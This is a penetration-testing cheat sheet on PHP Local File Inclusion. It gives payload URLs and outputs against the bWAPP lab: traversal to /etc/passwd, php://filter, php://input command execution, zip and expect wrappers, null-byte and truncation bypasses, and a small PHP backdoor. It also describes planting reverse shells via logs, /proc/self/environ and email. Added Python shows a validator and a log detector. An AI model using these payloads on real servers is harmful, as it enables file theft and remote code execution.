Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques

Jan 04, 2017, Version 1.0

Contents

What is a Local File Inclusion (LFI) vulnerability?
Example of Vulnerable Code
Identifying LFI Vulnerabilities within Web Applications
PHP Wrappers
PHP Expect Wrapper
PHP php://input Wrapper
PHP php://filter
PHP ZIP Wrapper LFI
LFI via /proc/self/environ
Useful Shells
Null Byte Technique
Truncation LFI Bypass
Log File Contamination
Apache / Nginx
Email a Reverse Shell
References

What is a Local File Inclusion (LFI) vulnerability?

Local File Inclusion (LFI) allows an attacker to include files on a server through the web browser. This vulnerability exists when a web application includes a file without correctly sanitising the input, allowing an attacker to manipulate the input, inject path traversal characters and include other files from the web server.

Example of Vulnerable Code

The following is an example of PHP code vulnerable to local file inclusion. The value of the file parameter is passed straight into include() without validation, so it can carry path traversal sequences or a stream wrapper:

<?php
// User-controlled value taken straight from the query string.
$file = $_GET['file'];
if (isset($file))
{
    // No validation: "../" sequences and wrappers such as php:// reach include() unchanged.
    include("pages/$file");
}
else
{
    include("index.php");
}
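As an added example (not code from the cheat sheet), the following Python function models the validation that the include() above is missing; the pages directory, the allowlist and the length limit are constructed values for the demonstration. Pass allowed=None to exercise the path checks on their own.

```python
import os
import re
from urllib.parse import unquote

# Added example, not code from the cheat sheet: a model of the validation that
# include("pages/$file") above lacks. PAGES_DIR, ALLOWED_PAGES and MAX_LEN are
# constructed values for the demonstration.
PAGES_DIR = os.path.realpath("/var/www/app/pages")
ALLOWED_PAGES = frozenset({"index.html", "about.html", "contact.html"})
MAX_LEN = 64
# Anything with a URL scheme prefix: php://, zip://, expect://, file:// ...
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")


def check_page(raw, base_dir=PAGES_DIR, allowed=ALLOWED_PAGES):
    """Validate a user-supplied page name before it reaches include().

    Returns (True, absolute_path) or (False, reason). Each check answers one
    technique from the cheat sheet. allowed=None skips the allowlist so the
    path checks can be seen on their own; real code should keep the allowlist,
    it is the control that makes the remaining checks defence in depth.
    """
    # Decode twice so %2500 cannot carry a %00 past a single decode layer.
    value = unquote(unquote(raw))
    if "\x00" in value:
        return False, "null byte"                  # /etc/passwd%00
    if SCHEME_RE.match(value):
        return False, "stream wrapper scheme"      # php://, zip://, expect://
    if len(value) > MAX_LEN:
        return False, "too long"                   # truncation padding
    if value.startswith("/"):
        return False, "absolute path"              # /proc/self/environ, log files
    if allowed is not None and value not in allowed:
        return False, "not in allowlist"
    # Resolve symlinks and ".." first, then compare whole paths rather than
    # scanning the string for "../".
    candidate = os.path.realpath(os.path.join(base_dir, value))
    if os.path.commonpath([candidate, base_dir]) != base_dir:
        return False, "escapes pages directory"    # ../../../../etc/passwd
    return True, candidate


if __name__ == "__main__":
    for probe in ("index.html", "../../../../../../../../etc/passwd",
                  "/etc/passwd%2500", "php://filter/resource=/etc/passwd"):
        print(probe, "->", check_page(probe, allowed=None))
```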

Identifying LFI Vulnerabilities within Web Applications

LFI vulnerabilities are easy to identify and exploit. Any script that includes a file from the web server is a good candidate for further LFI testing, for example:

/script.php?page=index.html

A penetration tester would attempt to exploit this vulnerability by manipulating the file location parameter, such as:

/script.php?page=../../../../../../../../etc/passwd

The above is an effort to display the contents of the /etc/passwd file on a UNIX / Linux based system.

Below is an example of a successful exploitation of an LFI vulnerability on a web application:

/bWAPP/rlfi.php?language=../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
hplip:x:104:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false
pulse:x:107:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:119::/var/run/dbus:/bin/false
avahi:x:109:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
polkituser:x:110:122:PolicyKit,,,:/var/run/PolicyKit:/bin/false
haldaemon:x:111:123:Hardware abstraction layer,,,:/var/run/hald:/bin/false
bee:x:1000:1000:bee,,,:/home/bee:/bin/bash
mysql:x:112:124:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin
dovecot:x:114:126:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
smmta:x:115:127:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:116:128:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
neo:x:1001:1001::/home/neo:/bin/sh
alice:x:1002:1002::/home/alice:/bin/sh
thor:x:1003:1003::/home/thor:/bin/sh
wolverine:x:1004:1004::/home/wolverine:/bin/sh
johnny:x:1005:1005::/home/johnny:/bin/sh
selene:x:1006:1006::/home/selene:/bin/sh
postfix:x:117:129::/var/spool/postfix:/bin/false
proftpd:x:118:65534::/var/run/proftpd:/bin/false
ftp:x:119:65534::/home/ftp:/bin/false
snmp:x:120:65534::/var/lib/snmp:/bin/false
ntp:x:121:131::/home/ntp:/bin/false

PHP Wrappers

PHP has a number of wrappers that can often be abused to bypass various input filters.

PHP Expect Wrapper

PHP expect:// allows execution of system commands; however, the expect PHP extension is not enabled by default, so this wrapper is usually unavailable.

Example:

php?page=expect://ls

PHP php://input Wrapper

The php://input wrapper reads the raw body of the request, so the PHP payload is sent in the body of a POST request while the wrapper is given as the page to include, such as:

/fi/?page=php://input&cmd=ls

Including php://input requires allow_url_include to be enabled, which is off by default in PHP.

Example using php://input against bWAPP:

Request:

POST /bWAPP/rlfi.php?language=php://input&cmd=id

<?php echo system($_GET['cmd']);

Response:

uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)

The output appears twice because system() prints the command output itself and also returns its last line, which echo prints again.

PHP php://filter

php://filter allows a pen tester to read local files, base64 encoding the output so that PHP source is returned rather than executed. Therefore, any base64 output will need to be decoded to reveal the contents.

An example using bWAPP:

Request:

/bWAPP/rlfi.php?language=php://filter/convert.base64-encode/resource=/etc/passwd

Response: the base64-encoded contents of /etc/passwd (a long base64 string, not reproduced here).

Base64 decoding the string provides the /etc/passwd file:

bee@bee-box:~$ echo '<base64 string from the response>' | base64 -d

The decoded output is the same /etc/passwd listing shown in the earlier example.

php://filter can also be used without base64 encoding the output using:

?page=php://filter/resource=/etc/passwd

bWAPP:

/bWAPP/rlfi.php?language=php://filter/resource=/etc/passwd

This returns the same /etc/passwd listing shown in the earlier example, in plain text.

PHP ZIP Wrapper LFI

The zip wrapper reads entries out of .zip archives server side, allowing a penetration tester to upload a zip file using a vulnerable file upload function and then reach a file inside it through the LFI, where it is executed as PHP. A typical attack example would look like:

1. Create a PHP reverse shell
2. Compress it to a .zip file
3. Upload the compressed shell payload to the server
4. Use the zip wrapper to include the payload using:
   php?page=zip://path/to/file.zip%23shell
   (%23 is the URL-encoded "#" that separates the archive path from the entry name)
5. The above includes the entry named shell from the archive; if the server does not append .php, name the entry shell.php instead

If the file upload function does not allow zip files to be uploaded, attempts can be made to bypass the file upload function (see: OWASP file upload testing document).

bWAPP /bWAPP/rlfi.php appends .php to the parameter, so the entry name in the archive must be given without the extension:

$language = $_GET["language"] . ".php";

Useful:

/bWAPP/rlfi.php?language=zip://./images/hehe.zip%23hehe
/bWAPP/rlfi.php?language=zip:///var/www/bWAPP/images/hehe.zip%23hehe

zip wrapper: the archive hehe.zip contains an entry hehe.php with the contents:

<?php phpinfo();

LFI via /proc/self/environ

If it's possible to include /proc/self/environ via a local file inclusion vulnerability, then introducing source code via the User-Agent header is a possible vector, because the header can appear in the PHP process's environment (this depends on how PHP is run; the technique only works where request headers end up in that environment). Once code has been injected into the User-Agent header, the local file inclusion vulnerability can be leveraged to include /proc/self/environ, which is parsed as PHP with the current environment variables, executing your reverse shell.

Useful Shells

Useful tiny PHP back doors for the above techniques:

<? system('uname -a');?>

Null Byte Technique

Null byte injection bypasses application filtering within web applications by adding a URL-encoded "null byte" such as %00. Typically, this bypasses basic web application blacklist filters: the null byte is allowed through by the filter but terminates the file name when the backend opens the file, so anything the application appends after it (such as the .php that bWAPP adds) is discarded. PHP 5.3.4 and later reject file paths containing a null byte, so this only applies to older versions.

Some practical examples of null byte injection for LFI:

/bWAPP/rlfi.php?language=/etc/passwd%00
/bWAPP/rlfi.php?language=/etc/passwd%2500

Truncation LFI Bypass

Truncation is another blacklist bypass technique. By injecting a long parameter into the vulnerable file inclusion mechanism, the web application may "cut off" (truncate) the input parameter at its maximum path length, which may bypass the input filter or drop an appended extension.

LFI truncation examples:

/bWAPP/rlfi.php?language=/etc/passwd…………………………………………………………………………….
/bWAPP/rlfi.php?language=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
/bWAPP/rlfi.php?language=/etc/passwd/../../../../../../../../../../../../../../../../../..

Log File Contamination

Log file contamination is the process of injecting source code into log files on the target system. This is achieved by introducing source code via other exposed services on the target system, which the target operating system / service will then store in log files. For example, injecting PHP reverse shell code into a requested URL causes the web server to write a 404 page-not-found entry containing that code to the Apache access log. The Apache log file would then be included using a previously discovered file inclusion vulnerability, executing the injected PHP reverse shell.

After introducing source code to the target system's log file(s), the next step is identifying the location of the log file. During the recon and discovery stage of penetration testing, the web server and likely the target operating system will have been identified; a good starting point is looking up the default log paths for the identified operating system and web server (if they are not already known to the consultant). FuzzDB's Burp LFI payload lists can be used in conjunction with Burp Intruder to quickly identify valid log file locations on the target system.

Some commonly exposed services on a Linux / UNIX systems are listed below:

Apache / Nginx

Inject code into the web server access or error logs using netcat; after successful injection, include the server log file by exploiting the previously discovered LFI vulnerability. If the web server access / error logs are large, it may take some time to execute your injected code, since the whole log is parsed by the PHP interpreter.
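The following added example (not part of the cheat sheet) turns the indicators from the wrapper, null byte, truncation and log contamination sections above into a detector run over Apache combined-format access log lines; the regexes, the length threshold and the sample log lines are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Added example, not from the cheat sheet: flag access-log lines carrying the
# LFI indicators described above. The regexes, the length threshold and the
# sample log lines are constructed for the demonstration.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
INDICATORS = [
    ("traversal",      re.compile(r"(?:\.\./){2,}")),
    ("null-byte",      re.compile(r"\x00")),
    ("php-wrapper",    re.compile(r"\b(?:php|zip|expect|data|file)://", re.I)),
    ("proc-environ",   re.compile(r"/proc/self/environ")),
    ("sensitive-file", re.compile(r"/etc/passwd|/var/log/(?:apache2|httpd|nginx)/")),
    ("truncation-pad", re.compile(r"\.{16,}")),
]
# A PHP open tag in User-Agent or Referer does nothing on its own, but it is the
# precursor to log file contamination: an LFI read of the log would execute it.
CODE_IN_HEADER = re.compile(r"<\?(?:php\b|\s)", re.I)
MAX_TARGET_LEN = 200


def decode(s):
    # Decode twice so %2500 (double-encoded null byte) shows up as NUL.
    return unquote(unquote(s))


def analyse_line(line):
    """Return the list of indicator names that fire for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    target = decode(m.group("target"))
    hits = [name for name, rx in INDICATORS if rx.search(target)]
    if len(target) > MAX_TARGET_LEN:
        hits.append("overlong-target")
    if CODE_IN_HEADER.search(m.group("ua")) or CODE_IN_HEADER.search(m.group("referer")):
        hits.append("php-code-in-header")
    return hits


# Constructed sample lines in Apache combined log format.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Jan/2017:10:00:01 +0000] "GET /bWAPP/rlfi.php?language=lang_en.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [04/Jan/2017:10:00:02 +0000] "GET /bWAPP/rlfi.php?language=../../../etc/passwd HTTP/1.1" 200 2410 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [04/Jan/2017:10:00:03 +0000] "GET /bWAPP/rlfi.php?language=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 3200 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [04/Jan/2017:10:00:04 +0000] "GET /bWAPP/rlfi.php?language=/etc/passwd%2500 HTTP/1.1" 200 2410 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [04/Jan/2017:10:00:05 +0000] "GET /bWAPP/rlfi.php?language=/proc/self/environ HTTP/1.1" 200 900 "-" "<?php system(\'uname -a\'); ?>"',
    '10.0.0.5 - - [04/Jan/2017:10:00:06 +0000] "GET /nonexistent HTTP/1.1" 404 300 "-" "<? system(\'uname -a\');?>"',
]


def scan(lines=SAMPLE_LOG):
    """Map 1-based line numbers to their indicator hits, flagged lines only."""
    return {n: hits for n, hits in enumerate(map(analyse_line, lines), 1) if hits}


if __name__ == "__main__":
    for n, hits in scan().items():
        print(f"line {n}: {', '.join(hits)}")
```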

Email a Reverse Shell

If the target machine relays mail, either directly or via another machine on the network, and stores mail for the user www-data (or the Apache user) on the system, then it's possible to email a reverse shell to the target. If no MX records exist for the domain but SMTP is exposed, it's possible to connect to the target mail server and send mail to the www-data / apache user. Mail is sent to the user running Apache, such as www-data, to ensure that file system permissions allow the web server to read the file /var/spool/mail/www-data containing the injected PHP reverse shell code.

First enumerate the target system using a list of known UNIX / Linux account names (screenshot not reproduced in this copy).

The following screenshot shows the process of sending email via telnet to the www-data user (screenshot not reproduced in this copy).

Resulting in a reverse shell connecting back to a running netcat listener (screenshot not reproduced in this copy).

References

Information sources used within this document:
https://highon.coffee/blog/lfi-cheat-sheet/
https://www.owasp.org/index.php/PHP_File_Inclusion
DVWA (used for LFI examples):
http://www.dvwa.co.uk/
